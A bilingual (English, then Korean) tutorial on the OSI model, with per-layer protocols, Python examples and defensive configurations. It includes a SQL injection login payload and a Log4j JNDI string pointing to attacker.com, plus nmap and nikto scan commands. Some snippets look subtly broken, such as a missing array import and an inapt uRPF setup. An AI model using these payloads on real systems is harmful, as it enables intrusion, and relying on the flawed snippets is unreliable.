Introduction to the OSI Model
The Open Systems Interconnection (OSI) model is a standard framework for network communication developed by ISO in 1984. This model provides a vendor-neutral networking framework, ensuring interoperability between different systems.
Historical Context and Purpose
- Establishing an open, vendor-neutral networking framework
- Implementing a modular network architecture
- Supporting standardized communication between heterogeneous systems
- Providing a systematic approach to network troubleshooting
Model Overview
1
2
3
4
5
6
7
| Layer 7 - Application Layer → End-user services
Layer 6 - Presentation Layer → Data formatting and encryption
Layer 5 - Session Layer → Session management
Layer 4 - Transport Layer → End-to-end transmission
Layer 3 - Network Layer → Routing and logical addressing
Layer 2 - Data Link Layer → Physical addressing and framing
Layer 1 - Physical Layer → Physical transmission
|
Detailed Technical Analysis of Each OSI Layer
Layer 7 - Application Layer
Basic Concepts
- The layer that interacts directly with users
- Provides network services to applications
- Manages user authentication and data privacy
- Coordinates application services
Key Protocols
1
2
3
4
5
6
| HTTP/HTTPS - Web browsing
FTP/SFTP - File transfer
SMTP/POP3 - Email services
DNS - Domain name resolution
SSH - Secure shell access
DHCP - Dynamic host configuration
|
Technical Implementation Example
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| # Basic HTTP Server Implementation
from http.server import HTTPServer, BaseHTTPRequestHandler
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write(b'Hello, World!')
# DNS Query Implementation
import dns.resolver
def resolve_domain(domain):
try:
answers = dns.resolver.resolve(domain, 'A')
return [rdata.address for rdata in answers]
except dns.resolver.NXDOMAIN:
return "Domain does not exist"
|
Security Considerations
- SQL Injection Prevention
- Cross-Site Scripting (XSS) Mitigation
- Cross-Site Request Forgery (CSRF) Protection
- API Security
- Input Validation and Sanitization
Layer 6 - Presentation Layer
Basic Concepts
- Responsible for data format conversion
- Performs encryption/decryption
- Handles character encoding transformations
- Manages data compression/decompression
- Supports MIME encoding/decoding
Key Standards
1
2
3
4
| ASCII/Unicode - Character encoding
JPEG, GIF, PNG - Image formats
MPEG, MOV - Video formats
SSL/TLS - Security protocols
|
Technical Implementation Example
1
2
3
4
5
6
7
8
9
10
11
12
| # Data Encryption
from cryptography.fernet import Fernet
def encrypt_data(data: str) -> tuple:
key = Fernet.generate_key()
f = Fernet(key)
encrypted_data = f.encrypt(data.encode())
return key, encrypted_data
# Character Encoding Conversion
def convert_encoding(text: str, from_encode: str, to_encode: str) -> str:
return text.encode(from_encode).decode(to_encode)
|
Security Considerations
- Choosing Secure Encryption Algorithms
- Key Management
- Certificate Management
- Keeping Encryption Protocols Updated
Layer 5 - Session Layer
Basic Concepts
- Establishing, maintaining, and terminating communication sessions
- Authentication and authorization
- Synchronization
- Dialogue control
- Session recovery
Key Protocols
1
2
3
4
| NetBIOS - Network Basic Input/Output System
RPC - Remote Procedure Call
SQL - Database Communication
SSH - Secure Shell Sessions
|
Technical Implementation Example
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| # Basic Session Management
import uuid
from datetime import datetime, timedelta
class SessionManager:
def __init__(self):
self.sessions = {}
def create_session(self, user_id: str) -> str:
session_id = str(uuid.uuid4())
self.sessions[session_id] = {
'user_id': user_id,
'created_at': datetime.now(),
'expires_at': datetime.now() + timedelta(hours=1)
}
return session_id
def validate_session(self, session_id: str) -> bool:
if session_id not in self.sessions:
return False
if datetime.now() > self.sessions[session_id]['expires_at']:
del self.sessions[session_id]
return False
return True
|
Security Considerations
- Preventing Session Hijacking
- Setting Session Timeouts
- Secure Session ID Generation
- Mitigating Session Fixation Attacks
Layer 4 - Transport Layer
Basic Concepts
- End-to-end communication control
- Reliable data transmission
- Flow control
- Error detection and recovery
- Segmentation/reassembly
Key Protocols
1
2
3
4
| TCP - Reliable connection-oriented communication
UDP - Connectionless communication
SCTP - Stream Control Transmission Protocol
DCCP - Datagram Congestion Control Protocol
|
Technical Implementation Example
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| # TCP socket communication example
import socket
def create_tcp_server(host: str, port: int):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind((host, port))
server_socket.listen(5)
return server_socket
# UDP communication example
def create_udp_socket(host: str, port: int):
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.bind((host, port))
return udp_socket
|
Security Considerations
- SYN flooding prevention
- TCP session hijacking mitigation
- DDoS attack preparedness
- Port scanning detection
Layer 3 - Network Layer
Basic Concepts
- Packet routing
- Logical addressing
- Packet forwarding
- Path selection
- Traffic control
Key Protocols
1
2
3
4
| IPv4/IPv6 - Internet Protocol
ICMP - Internet Control Message Protocol
OSPF - Open Shortest Path First
BGP - Border Gateway Protocol
|
Technical Implementation Example
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| # IP address handling example
import ipaddress
def analyze_network(cidr: str):
network = ipaddress.ip_network(cidr)
return {
'network_address': str(network.network_address),
'broadcast_address': str(network.broadcast_address),
'total_hosts': network.num_addresses,
'netmask': str(network.netmask)
}
# ICMP ping implementation
def ping_host(host: str) -> bool:
import subprocess
try:
subprocess.check_output(
['ping', '-c', '1', host],
stderr=subprocess.STDOUT,
universal_newlines=True
)
return True
except subprocess.CalledProcessError:
return False
|
Security Considerations
- IP spoofing prevention
- Routing table protection
- ICMP attack mitigation
- Packet filtering
Layer 2 - Data Link Layer
Basic Concepts
- Physical addressing
- Frame creation/management
- Error detection/correction
- Media access control
- Flow control
Key Protocols
1
2
3
4
| Ethernet - Ethernet protocol
PPP - Point-to-Point Protocol
HDLC - High-level Data Link Control
IEEE 802.11 - Wireless LAN
|
Technical Implementation Example
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| # MAC address handling
import uuid
def generate_mac_address():
return ':'.join([f'{x:02x}' for x in uuid.getnode().to_bytes(6, 'big')])
# Frame checksum calculation
def calculate_checksum(data: bytes) -> int:
if len(data) % 2 == 1:
data += b'\0'
words = array.array('H', data)
checksum = sum(words)
checksum = (checksum >> 16) + (checksum & 0xFFFF)
checksum = ~checksum & 0xFFFF
return checksum
|
Security Considerations
- MAC spoofing prevention
- ARP spoofing mitigation
- VLAN hopping prevention
- STP attack mitigation
Layer 1 - Physical Layer
Basic Concepts
- Bit transmission
- Physical topology
- Transmission media management
- Signal modulation/demodulation
- Bit synchronization
Key Standards
1
2
3
4
| RS-232 - Serial communication
RJ-45 - Ethernet cabling
IEEE 802.3 - Ethernet physical layer
Fiber optic standards
|
Technical Implementation Example
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| # Serial communication example
import serial
def serial_communication(port: str, baudrate: int):
ser = serial.Serial(
port=port,
baudrate=baudrate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS
)
return ser
# Signal strength monitoring
def monitor_signal_strength(interface: str) -> float:
try:
with open(f'/sys/class/net/{interface}/wireless/link') as f:
return float(f.read())
except:
return 0.0
|
Security Considerations
- Physical access control
- Electromagnetic interference prevention
- Wiretapping prevention
- Cable security
- Power security
Layer-by-Layer Security Analysis
Layer 7 - Application Layer
Modern Threats and Attack Vectors
- API Security Threats
1
2
3
4
5
| # API abuse example
POST /api/v1/authenticate HTTP/1.1
Content-Type: application/json
{"username": "' OR '1'='1", "password": "anything"}
|
- Modern Web Application Attacks
1
2
| // Log4j vulnerability exploitation example
${jndi:ldap://attacker.com/exploit}
|
- Recent Attack Cases
- 2023 MOVEit Transfer zero-day vulnerability exploitation
- 2024 Citrix NetScaler ADC remote code execution
Defense Strategies
- Modern WAF Implementation
1
2
3
4
5
6
7
8
9
10
| # Next-generation WAF configuration with ML-based detection
location / {
modsecurity on;
modsecurity_rules_file /etc/nginx/modsecurity/main.conf;
# AI/ML-based anomaly detection
anomaly_detection on;
learning_mode off;
threshold 75;
}
|
- Zero Trust Application Access ```yaml
Modern identity-aware proxy example
apiVersion: security.istio.io/v1beta1 kind: AuthorizationPolicy metadata: name: zero-trust-policy spec: selector: matchLabels: app: secure-app rules:
- from:
- source: requestPrincipals: [“*”] to:
- operation: methods: [“GET”] paths: [“/api/public/*”] ```
Layer 6 - Presentation Layer
Modern Encryption Challenges
- Post-Quantum Encryption Preparation
1
2
| # Testing post-quantum TLS support
openssl s_client -connect example.com:443 -groups kyber512
|
- Recent SSL/TLS Vulnerabilities
1
2
| # Detecting vulnerable configurations
sslscan --no-failed --no-renegotiation --no-heartbleed example.com
|
Advanced Defense Mechanisms
- Modern TLS Configuration
1
2
3
4
| ssl_protocols TLSv1.3;
ssl_prefer_server_ciphers off;
ssl_conf_command Options PrioritizeChaCha;
ssl_early_data on; # 0-RTT support
|
Layer 5 - Session Layer
Modern Session Attacks
- Token Manipulation in Modern Apps
1
2
3
4
5
6
7
8
9
10
11
12
13
| # JWT token security implementation
from jwt import encode, decode
from cryptography.fernet import Fernet
def secure_token_generation():
key = Fernet.generate_key()
f = Fernet(key)
token = encode(
{'user_id': 123, 'exp': datetime.now() + timedelta(hours=1)},
key,
algorithm='HS256'
)
return f.encrypt(token.encode()).decode()
|
- Session Fixation Attack Prevention
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| # Modern session security using Redis
from redis import Redis
from uuid import uuid4
redis_client = Redis(host='localhost', port=6379, db=0)
def create_secure_session():
session_id = str(uuid4())
redis_client.setex(
f"session:{session_id}",
3600, # 1 hour expiration
json.dumps({'created': str(datetime.now())})
)
return session_id
|
Layer 4 - Transport Layer
Modern DDoS Protection
- Advanced Rate Limiting
1
2
3
4
5
6
7
| # Modern iptables configuration using hashlimit
iptables -A INPUT -p tcp --dport 80 -m hashlimit \
--hashlimit-name http \
--hashlimit-above 50/sec \
--hashlimit-burst 200 \
--hashlimit-mode srcip \
-j DROP
|
- TCP/UDP Flood Protection
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| # Advanced DDoS detection script
from scapy.all import *
from collections import defaultdict
import time
class DDoSDetector:
def __init__(self):
self.connections = defaultdict(int)
self.last_cleanup = time.time()
def packet_callback(self, pkt):
if IP in pkt and TCP in pkt:
src_ip = pkt[IP].src
self.connections[src_ip] += 1
# Check threshold violation
if self.connections[src_ip] > 1000: # threshold
print(f"Possible DDoS detected: {src_ip}")
# Implement mitigation measures...
# Usage
detector = DDoSDetector()
sniff(prn=detector.packet_callback, store=0)
|
Layer 3 - Network Layer
Modern Network Attacks
- BGP Hijacking Detection
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| # BGP monitoring script
import radix
from cymru.bogon.ip import BogonIP
def check_bgp_announcement(prefix, as_path):
rtree = radix.Radix()
bogon = BogonIP()
if bogon.is_bogon(prefix):
return "Bogon prefix detected"
# Check AS path irregularities
if len(set(as_path)) != len(as_path):
return "AS path loop detected"
|
- Advanced IP Spoofing Prevention
1
2
3
4
5
6
7
8
| # Modern uRPF implementation
ip route add blackhole 192.0.2.0/24
# Interface configuration for uRPF
ip link set dev eth0 promisc on
tc qdisc add dev eth0 handle 1: root prio
tc filter add dev eth0 parent 1: protocol ip prio 1 u32 \
match ip src 192.0.2.0/24 action drop
|
Layer 2 - Data Link Layer
Modern Layer 2 Security
- Advanced VLAN Security
! Modern VLAN security configuration
vlan 100
name SECURE_VLAN
!
interface GigabitEthernet1/0/1
switchport access vlan 100
switchport mode access
switchport port-security
switchport port-security maximum 2
switchport port-security violation restrict
switchport port-security aging time 2
spanning-tree bpduguard enable
spanning-tree guard root
- MAC Address Security
1
2
3
4
5
6
7
8
9
10
| # MAC address monitoring script
from scapy.all import *
def detect_mac_spoofing(pkt):
if ARP in pkt:
# Check for MAC-IP pair mismatch
if pkt[ARP].hwsrc != pkt[Ether].src:
print(f"Possible MAC spoofing detected: {pkt[ARP].hwsrc}")
sniff(prn=detect_mac_spoofing, filter="arp", store=0)
|
Layer 1 - Physical Layer
Modern Physical Security
- Fiber Optic Security
1
2
3
4
5
6
7
8
9
| # Optical power monitoring script
import serial
def monitor_optical_power(port="/dev/ttyUSB0"):
ser = serial.Serial(port, 9600)
while True:
power = float(ser.readline())
if power < -25: # dBm threshold
alert("Possible fiber optic tampering detected")
|
- Physical Access Monitoring
1
2
3
4
5
6
7
8
9
| # RFID access monitoring
from evdev import InputDevice, categorize, ecodes
def monitor_rfid_access():
dev = InputDevice('/dev/input/event0')
for event in dev.read_loop():
if event.type == ecodes.EV_KEY:
# Log and verify access attempts
verify_access(event.code)
|
Modern Security Implementation
Zero Trust Architecture Implementation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| # Modern zero trust policy
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: zero-trust-policy
spec:
selector:
matchLabels:
app: secure-service
rules:
- from:
- source:
principals: ["cluster.local/ns/default/sa/service-account"]
requestPrincipals: ["*"]
to:
- operation:
methods: ["GET"]
paths: ["/api/v1/*"]
when:
- key: request.auth.claims[iss]
values: ["https://trusted-issuer.example.com"]
|
Cloud Native Security Controls
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| # Kubernetes network policy
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: secure-policy
spec:
podSelector:
matchLabels:
app: secure-app
policyTypes:
- Ingress
- Egress
ingress:
- from:
- namespaceSelector:
matchLabels:
trusted: "true"
ports:
- protocol: TCP
port: 443
egress:
- to:
- namespaceSelector:
matchLabels:
logging: "true"
ports:
- protocol: TCP
port: 5044
|
Security Monitoring and Detection
Modern SIEM Integration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| # Advanced log processing with ML detection
from elasticsearch import Elasticsearch
import pandas as pd
from sklearn.ensemble import IsolationForest
class SecurityMonitor:
def __init__(self):
self.es = Elasticsearch()
self.model = IsolationForest(contamination=0.1)
def process_logs(self):
logs = self.es.search(
index="security-logs-*",
body={
"query": {
"range": {
"@timestamp": {
"gte": "now-1h"
}
}
}
}
)
# Convert to DataFrame for analysis
df = pd.DataFrame(logs['hits']['hits'])
# Anomaly detection
predictions = self.model.fit_predict(df)
return df[predictions == -1] # Return anomalous items
|
Real-time Threat Detection
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| # Real-time packet analysis using ML
from scapy.all import *
import numpy as np
from tensorflow import keras
class PacketAnalyzer:
def __init__(self):
self.model = keras.models.load_model('threat_detection.h5')
def analyze_packet(self, pkt):
if IP in pkt:
# Feature extraction
features = self.extract_features(pkt)
# Predict threat level
prediction = self.model.predict(
np.array([features])
)
if prediction > 0.8: # High threat threshold
self.alert_security_team(pkt)
def extract_features(self, pkt):
return [
len(pkt),
pkt[IP].ttl,
len(pkt[IP].options),
# Additional features...
]
|
Testing and Validation
Automated Security Testing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| # Comprehensive security test suite
import pytest
from security_tests import *
class TestSecurityControls:
@pytest.fixture
def setup_environment(self):
# Set up security test environment
pass
def test_layer7_security(self, setup_environment):
# Application layer security tests
assert test_waf_rules() == True
assert test_api_security() == True
def test_encryption(self, setup_environment):
# Encryption implementation tests
assert test_tls_configuration() == True
assert test_cipher_strength() == True
def test_network_security(self, setup_environment):
# Network layer security tests
assert test_firewall_rules() == True
assert test_ids_configuration() == True
|
- Network Security
- Wireshark: Packet analysis
- Nmap: Network scanning
- Snort: Intrusion detection
- pfSense: Firewall management
- Application Security
- OWASP ZAP: Web app testing
- Burp Suite: Security testing
- SonarQube: Code analysis
- Acunetix: Vulnerability scanning
- System Security
- OpenVAS: Vulnerability assessment
- Nessus: Security scanning
- Metasploit: Penetration testing
- OSSEC: Host-based IDS
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| # Essential security monitoring commands
# Network monitoring
tcpdump -i any -n 'port 80 or port 443'
netstat -tunap
iftop -P
# System monitoring
htop
iotop
lsof -i
# Security scanning
nmap -sS -sV -p- target.com
nikto -h target.com
sslyze --regular target.com:443
|
Reference Materials
OSI 모델 소개
OSI(Open Systems Interconnection) 모델은 1984년 ISO에서 개발한 네트워크 통신의 표준 프레임워크입니다. 이 모델은 벤더 중립적인 네트워킹 프레임워크를 제공하여 다양한 시스템 간의 상호운용성을 보장합니다.
역사적 맥락과 목적
- 개방형, 벤더 중립적 네트워킹 프레임워크 구축
- 모듈식 네트워크 아키텍처 구현
- 이기종 시스템 간 표준화된 통신 지원
- 체계적인 네트워크 문제 해결 방법론 제공
모델 개요
1
2
3
4
5
6
7
| 계층 7 - 애플리케이션 계층 → 최종 사용자 서비스
계층 6 - 프레젠테이션 계층 → 데이터 형식 및 암호화
계층 5 - 세션 계층 → 세션 관리
계층 4 - 전송 계층 → 종단간 전송
계층 3 - 네트워크 계층 → 라우팅 및 논리 주소
계층 2 - 데이터링크 계층 → 물리 주소 지정 및 프레이밍
계층 1 - 물리 계층 → 물리적 전송
|
OSI 모델의 계층별 기술 상세
Layer 7 - 애플리케이션 계층
기본 개념
- 사용자와 직접 상호작용하는 계층
- 네트워크 서비스를 애플리케이션에 제공
- 사용자 인증 및 데이터 프라이버시 관리
- 애플리케이션 서비스 조정
주요 프로토콜
1
2
3
4
5
6
| HTTP/HTTPS - 웹 브라우징
FTP/SFTP - 파일 전송
SMTP/POP3 - 이메일 서비스
DNS - 도메인 이름 해석
SSH - 보안 셸 접속
DHCP - 동적 호스트 설정
|
기술 구현 예시
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| # HTTP 서버 기본 구현
from http.server import HTTPServer, BaseHTTPRequestHandler
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write(b'Hello, World!')
# DNS 조회 구현
import dns.resolver
def resolve_domain(domain):
try:
answers = dns.resolver.resolve(domain, 'A')
return [rdata.address for rdata in answers]
except dns.resolver.NXDOMAIN:
return "도메인이 존재하지 않습니다"
|
보안 고려사항
- SQL 인젝션 방지
- XSS(Cross-Site Scripting) 대응
- CSRF(Cross-Site Request Forgery) 보호
- API 보안
- 입력값 검증 및 살균
Layer 6 - 프레젠테이션 계층
기본 개념
- 데이터 형식 변환 담당
- 암호화/복호화 수행
- 문자 인코딩 변환
- 데이터 압축/압축해제
- MIME 인코딩/디코딩
주요 표준
1
2
3
4
| ASCII/Unicode - 문자 인코딩
JPEG, GIF, PNG - 이미지 형식
MPEG, MOV - 비디오 형식
SSL/TLS - 보안 프로토콜
|
기술 구현 예시
1
2
3
4
5
6
7
8
9
10
11
12
| # 데이터 암호화
from cryptography.fernet import Fernet
def encrypt_data(data: str) -> tuple:
key = Fernet.generate_key()
f = Fernet(key)
encrypted_data = f.encrypt(data.encode())
return key, encrypted_data
# 문자 인코딩 변환
def convert_encoding(text: str, from_encode: str, to_encode: str) -> str:
return text.encode(from_encode).decode(to_encode)
|
보안 고려사항
- 안전한 암호화 알고리즘 선택
- 키 관리
- 인증서 관리
- 암호화 프로토콜 최신화
Layer 5 - 세션 계층
기본 개념
- 통신 세션 수립, 유지, 종료
- 인증 및 권한 부여
- 동기화
- 대화 제어
- 중단된 세션 복구
주요 프로토콜
1
2
3
4
| NetBIOS - 네트워크 기본 입출력
RPC - 원격 프로시저 호출
SQL - 데이터베이스 통신
SSH - 보안 셸 세션
|
기술 구현 예시
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| # 세션 관리 기본 구현
import uuid
from datetime import datetime, timedelta
class SessionManager:
def __init__(self):
self.sessions = {}
def create_session(self, user_id: str) -> str:
session_id = str(uuid.uuid4())
self.sessions[session_id] = {
'user_id': user_id,
'created_at': datetime.now(),
'expires_at': datetime.now() + timedelta(hours=1)
}
return session_id
def validate_session(self, session_id: str) -> bool:
if session_id not in self.sessions:
return False
if datetime.now() > self.sessions[session_id]['expires_at']:
del self.sessions[session_id]
return False
return True
|
보안 고려사항
- 세션 하이재킹 방지
- 세션 타임아웃 설정
- 안전한 세션 ID 생성
- 세션 고정 공격 방지
Layer 4 - 전송 계층
기본 개념
- 종단간 통신 제어
- 신뢰성 있는 데이터 전송
- 흐름 제어
- 오류 검출 및 복구
- 세그멘테이션/재조립
주요 프로토콜
1
2
3
4
| TCP - 신뢰성 있는 연결 지향 통신
UDP - 비연결 지향 통신
SCTP - 스트림 제어 전송
DCCP - 데이터그램 혼잡 제어
|
기술 구현 예시
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| # TCP 소켓 통신 예시
import socket
def create_tcp_server(host: str, port: int):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind((host, port))
server_socket.listen(5)
return server_socket
# UDP 통신 예시
def create_udp_socket(host: str, port: int):
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.bind((host, port))
return udp_socket
|
보안 고려사항
- SYN 플러딩 방지
- TCP 세션 하이재킹 대응
- DDoS 공격 대비
- 포트 스캐닝 탐지
Layer 3 - 네트워크 계층
기본 개념
- 패킷 라우팅
- 논리적 주소 지정
- 패킷 포워딩
- 경로 선택
- 트래픽 제어
주요 프로토콜
1
2
3
4
| IPv4/IPv6 - 인터넷 프로토콜
ICMP - 인터넷 제어 메시지
OSPF - 최단 경로 우선 라우팅
BGP - 경계 게이트웨이 프로토콜
|
기술 구현 예시
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| # IP 주소 처리 예시
import ipaddress
def analyze_network(cidr: str):
network = ipaddress.ip_network(cidr)
return {
'network_address': str(network.network_address),
'broadcast_address': str(network.broadcast_address),
'total_hosts': network.num_addresses,
'netmask': str(network.netmask)
}
# ICMP 핑 구현
def ping_host(host: str) -> bool:
import subprocess
try:
subprocess.check_output(
['ping', '-c', '1', host],
stderr=subprocess.STDOUT,
universal_newlines=True
)
return True
except subprocess.CalledProcessError:
return False
|
보안 고려사항
- IP 스푸핑 방지
- 라우팅 테이블 보호
- ICMP 공격 대응
- 패킷 필터링
Layer 2 - 데이터링크 계층
기본 개념
- 물리적 주소 지정
- 프레임 생성/관리
- 오류 감지/수정
- 매체 접근 제어
- 흐름 제어
주요 프로토콜
1
2
3
4
| Ethernet - 이더넷 프로토콜
PPP - 지점간 프로토콜
HDLC - 고수준 데이터링크 제어
IEEE 802.11 - 무선 LAN
|
기술 구현 예시
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| # MAC 주소 처리
import uuid
def generate_mac_address():
return ':'.join([f'{x:02x}' for x in uuid.getnode().to_bytes(6, 'big')])
# 프레임 체크섬 계산
def calculate_checksum(data: bytes) -> int:
if len(data) % 2 == 1:
data += b'\0'
words = array.array('H', data)
checksum = sum(words)
checksum = (checksum >> 16) + (checksum & 0xFFFF)
checksum = ~checksum & 0xFFFF
return checksum
|
보안 고려사항
- MAC 스푸핑 방지
- ARP 스푸핑 대응
- VLAN 호핑 방지
- STP 공격 대응
Layer 1 - 물리 계층
기본 개념
- 비트 전송
- 물리적 토폴로지
- 전송 매체 관리
- 신호 변조/복조
- 비트 동기화
주요 표준
1
2
3
4
| RS-232 - 시리얼 통신
RJ-45 - 이더넷 케이블링
IEEE 802.3 - 이더넷 물리 계층
광섬유 표준
|
기술 구현 예시
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| # 시리얼 통신 예시
import serial
def serial_communication(port: str, baudrate: int):
ser = serial.Serial(
port=port,
baudrate=baudrate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS
)
return ser
# 신호 강도 모니터링
def monitor_signal_strength(interface: str) -> float:
try:
with open(f'/sys/class/net/{interface}/wireless/link') as f:
return float(f.read())
except:
return 0.0
|
보안 고려사항
- 물리적 접근 통제
- 전자기 간섭 방지
- 도청 방지
- 케이블 보안
- 전원 보안
계층별 보안 분석
Layer 7 - 애플리케이션 계층
현대의 위협과 공격 벡터
- API 보안 위협
1
2
3
4
5
| # API 악용 예시
POST /api/v1/authenticate HTTP/1.1
Content-Type: application/json
{"username": "' OR '1'='1", "password": "anything"}
|
- 현대적 웹 애플리케이션 공격
1
2
| // Log4j 취약점 악용 예시
${jndi:ldap://attacker.com/exploit}
|
- 최근 공격 사례
- 2023년 MOVEit Transfer 제로데이 취약점 악용
- 2024년 Citrix NetScaler ADC 원격 코드 실행
방어 전략
- 현대적 WAF 구현
1
2
3
4
5
6
7
8
9
10
| # ML 기반 탐지가 포함된 차세대 WAF 설정
location / {
modsecurity on;
modsecurity_rules_file /etc/nginx/modsecurity/main.conf;
# AI/ML 기반 이상 탐지
anomaly_detection on;
learning_mode off;
threshold 75;
}
|
- 제로 트러스트 애플리케이션 접근 ```yaml
현대적 신원 인식 프록시 사용 예시
apiVersion: security.istio.io/v1beta1 kind: AuthorizationPolicy metadata: name: zero-trust-policy spec: selector: matchLabels: app: secure-app rules:
- from:
- source: requestPrincipals: [“*”] to:
- operation: methods: [“GET”] paths: [“/api/public/*”] ```
Layer 6 - 프레젠테이션 계층
현대적 암호화 과제
- 포스트 퀀텀 암호화 준비
1
2
| # 포스트 퀀텀 TLS 지원 테스트
openssl s_client -connect example.com:443 -groups kyber512
|
- 최근 SSL/TLS 취약점
1
2
| # 취약한 설정 탐지
sslscan --no-failed --no-renegotiation --no-heartbleed example.com
|
고급 방어 메커니즘
- 현대적 TLS 설정
1
2
3
4
| ssl_protocols TLSv1.3;
ssl_prefer_server_ciphers off;
ssl_conf_command Options PrioritizeChaCha;
ssl_early_data on; # 0-RTT 지원
|
Layer 5 - 세션 계층
현대적 세션 공격
- 현대적 앱에서의 토큰 조작
1
2
3
4
5
6
7
8
9
10
11
12
13
| # JWT 토큰 보안 구현
from jwt import encode, decode
from cryptography.fernet import Fernet
def secure_token_generation():
key = Fernet.generate_key()
f = Fernet(key)
token = encode(
{'user_id': 123, 'exp': datetime.now() + timedelta(hours=1)},
key,
algorithm='HS256'
)
return f.encrypt(token.encode()).decode()
|
- 세션 고정 공격 방지
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| # Redis를 사용한 현대적 세션 보안
from redis import Redis
from uuid import uuid4
redis_client = Redis(host='localhost', port=6379, db=0)
def create_secure_session():
session_id = str(uuid4())
redis_client.setex(
f"session:{session_id}",
3600, # 1시간 만료
json.dumps({'created': str(datetime.now())})
)
return session_id
|
Layer 4 - 전송 계층
현대적 DDoS 보호
- 고급 속도 제한
1
2
3
4
5
6
7
| # hashlimit를 사용한 현대적 iptables 설정
iptables -A INPUT -p tcp --dport 80 -m hashlimit \
--hashlimit-name http \
--hashlimit-above 50/sec \
--hashlimit-burst 200 \
--hashlimit-mode srcip \
-j DROP
|
- TCP/UDP 플러드 보호
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| # 고급 DDoS 탐지를 위한 파이썬 스크립트
from scapy.all import *
from collections import defaultdict
import time
class DDoSDetector:
def __init__(self):
self.connections = defaultdict(int)
self.last_cleanup = time.time()
def packet_callback(self, pkt):
if IP in pkt and TCP in pkt:
src_ip = pkt[IP].src
self.connections[src_ip] += 1
# 임계값 위반 확인
if self.connections[src_ip] > 1000: # 임계값
print(f"가능한 DDoS 발견: {src_ip}")
# 완화 조치 구현...
# 사용법
detector = DDoSDetector()
sniff(prn=detector.packet_callback, store=0)
|
Layer 3 - 네트워크 계층
현대적 네트워크 공격
- BGP 하이재킹 탐지
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| # BGP 모니터링 스크립트
import radix
from cymru.bogon.ip import BogonIP
def check_bgp_announcement(prefix, as_path):
rtree = radix.Radix()
bogon = BogonIP()
if bogon.is_bogon(prefix):
return "보곤 프리픽스 탐지됨"
# AS 경로 불규칙성 확인
if len(set(as_path)) != len(as_path):
return "AS 경로 루프 탐지됨"
|
- 고급 IP 스푸핑 방지
1
2
3
4
5
6
7
8
| # 현대적 uRPF 구현
ip route add blackhole 192.0.2.0/24
# uRPF를 위한 인터페이스 설정
ip link set dev eth0 promisc on
tc qdisc add dev eth0 handle 1: root prio
tc filter add dev eth0 parent 1: protocol ip prio 1 u32 \
match ip src 192.0.2.0/24 action drop
|
Layer 2 - 데이터 링크 계층
현대적 Layer 2 보안
- 고급 VLAN 보안
! 현대적 VLAN 보안 설정
vlan 100
name SECURE_VLAN
!
interface GigabitEthernet1/0/1
switchport access vlan 100
switchport mode access
switchport port-security
switchport port-security maximum 2
switchport port-security violation restrict
switchport port-security aging time 2
spanning-tree bpduguard enable
spanning-tree guard root
- MAC 주소 보안
1
2
3
4
5
6
7
8
9
10
| # MAC 주소 모니터링 스크립트
from scapy.all import *
def detect_mac_spoofing(pkt):
if ARP in pkt:
# MAC-IP 쌍의 불일치 확인
if pkt[ARP].hwsrc != pkt[Ether].src:
print(f"가능한 MAC 스푸핑 탐지됨: {pkt[ARP].hwsrc}")
sniff(prn=detect_mac_spoofing, filter="arp", store=0)
|
Layer 1 - 물리 계층
현대적 물리 보안
- 광섬유 보안
1
2
3
4
5
6
7
8
9
| # 광학 파워 모니터링 스크립트
import serial
def monitor_optical_power(port="/dev/ttyUSB0"):
ser = serial.Serial(port, 9600)
while True:
power = float(ser.readline())
if power < -25: # dBm 임계값
alert("가능한 광섬유 변조 탐지됨")
|
- 물리적 접근 모니터링
1
2
3
4
5
6
7
8
9
| # RFID 접근 모니터링
from evdev import InputDevice, categorize, ecodes
def monitor_rfid_access():
dev = InputDevice('/dev/input/event0')
for event in dev.read_loop():
if event.type == ecodes.EV_KEY:
# 접근 시도 로깅 및 검증
